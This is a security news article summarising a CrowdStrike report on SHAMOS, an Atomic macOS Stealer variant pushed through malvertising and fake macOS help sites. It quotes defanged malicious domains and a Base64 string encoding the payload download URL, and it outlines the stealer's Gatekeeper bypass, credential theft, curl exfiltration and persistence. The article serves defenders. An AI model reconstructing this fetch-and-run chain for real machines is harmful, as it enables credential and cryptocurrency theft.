Over 300 entities hit by the Atomic macOS Stealer via malvertising campaign between June and August, CrowdStrike warns.
From June and August, over 300 entities were hit by a variant of the Atomic macOS Stealer (AMOS) called SHAMOS, reports CrowdStrike.
The Atomic macOS Stealer lets operators steal diverse information from infected machines. This includes Keychain passwords, system details, desktop files, and macOS passwords.
The malware is able to steal data from multiple browsers, including auto-fills, passwords, cookies, wallets, and credit card information. AMOS can target multiple cryptowallets such as Electrum, Binance, Exodus, Atomic, and Coinomi.
Between June and Aug 2025, CrowdStrike blocked over 300 SHAMOS attacks by the cybercrime group COOKIE SPIDER. Sold as malware-as-a-service, SHAMOS was spread via malvertising, luring victims to fake macOS help sites and tricking them into running a malicious one-line install command.
“Operating as malware-as-a-service, COOKIE SPIDER rents this information stealer to cybercriminals who deploy it to harvest sensitive information and cryptocurrency assets from victims. The campaign utilized malvertising to direct users to fraudulent macOS help websites where victims were instructed to execute a malicious one-line installation command.” reads the report published by CrowdStrike. “This campaign underscores the popularity of malicious one-line installation commands among eCrime actors”
This technique bypasses Gatekeeper checks, installing Mach-O executables. It highlights cybercrime’s growing reliance on such commands, also seen in prior Cuckoo Stealer and SHAMOS Homebrew campaigns.
In June 2025, a malvertising campaign lured users searching macOS help (e.g., “flush resolver cache”) to fake sites. Victims spanned in Canada, China, Colombia, Italy, Japan, Mexico, the US, the UK, and other countries, but none in Russia, likely because Russian operators of MaaS ban targeting Russia and CIS countries.
Threat actors spoofed an Australia-based store in Google Ads to promote fake macOS help sites (mac-safer[.]com, rescue-mac[.]com). Victims were tricked into executing a malicious one-line command in Terminal that decoded a Base64 string, stole passwords, and installed SHAMOS malware from icloudservers[.]com.
“The command decodes the Base64-encoded string aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo and downloads a file from https[:]//icloudservers[.]com/gm/install[.]sh.” reads the report published by CrowdStrike.
“This file is a Bash script that captures the user’s password and downloads a SHAMOS Mach-O executable from https[:]//icloudservers[.]com/gm/update.”
Since June 2025, CrowdStrike has tracked continued use of such malvertising campaigns, often disguised as free macOS tools, using either plain text or Base64-encoded URLs.
SHAMOS installs itself in the /tmp/ directory, stripping file attributes to bypass Apple’s Gatekeeper protections before making itself executable. It runs checks to avoid sandboxes and then uses AppleScript to scan the system, searching for cryptocurrency wallets, Keychain data, AppleNotes, and browser credentials. Stolen files are packed into out.zip and sent out via curl. The malware also downloads extra payloads, including a fake Ledger Live app and a botnet module, hiding them in the user’s home directory. To stay persistent, it creates a com.finder.helper.plist file in LaunchDaemons if it has Sudo access. Frequent curl activity shows its botnet module in action.
“This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors.” concludes the report. “Promoting false malicious websites encourages more site traffic, which will lead to more potential victims. The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim’s machine while bypassing Gatekeeper checks.”
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
Pierluigi Paganini
(SecurityAffairs – hacking, Atomic macOS Stealer)
